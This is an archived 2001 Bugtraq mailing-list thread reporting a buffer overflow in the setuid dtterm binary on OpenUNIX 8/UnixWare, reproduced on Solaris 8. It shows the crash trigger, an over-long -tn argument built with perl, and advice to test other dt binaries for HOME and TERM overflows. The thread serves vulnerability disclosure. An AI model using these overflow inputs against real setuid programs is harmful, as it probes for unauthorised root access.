[22781] in bugtraq
Re: OpenUNIX 8 & Unixware possible local root
daemon@ATHENA.MIT.EDU (KF)
Wed Oct 3 16:30:31 2001
Message-ID: <3BBB444C.CA9A228D@snosoft.com>
Date: Wed, 03 Oct 2001 13:01:00 -0400
From: KF <dotslash@snosoft.com>
To: "Cushing, David" <David.Cushing@hitachisoftware.com>,
bugtraq@securityfocus.com
You guys should check ALL the dt suid / sgid against command line
HOME and TERM overflows ... as stated prior I have made ALL dt binaries
that are sgid / suid core on OpenUnix8 except dtmail which already had
issues I believe.
-KF
"Cushing, David" wrote:
>
> I was able to reproduce this on a Solaris 8 sparc machine with different
> tolerances:
>
> [288] uname -a
> SunOS hostname 5.8 Generic_108528-08 sun4u sparc SUNW,Ultra-60
> [289] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'`
> Segmentation Fault(coredump)
> [297] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x2083'`
> Bus Error(coredump)
> ginger:dcushing[298]
>
> -David
>
> > -----Original Message-----
> > From: Aycan Irican [mailto:aycan@mars.prosoft.com.tr]
> > Sent: Tuesday, October 02, 2001 1:55 AM
> > To: bugtraq@securityfocus.com
> > Cc: evrim@envy.com.tr
> > Subject: OpenUNIX 8 & Unixware possible local root
> >
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > Another dt series bug...
> >
> > $ uname -a
> > OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5
> > $ id
> > uid=101(fixxxer) gid=1(other)
> > $ ls -al /usr/dt/bin/dtterm
> > - -r-sr-xr-x 1 root bin 60892 Haz 10 05:03 /usr/dt/bin/dtterm
> > $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
> > Warning: Missing charsets in String to FontSet conversion
> > Warning: Missing charsets in String to FontSet conversion
> > Memory fault
> > .. snip ..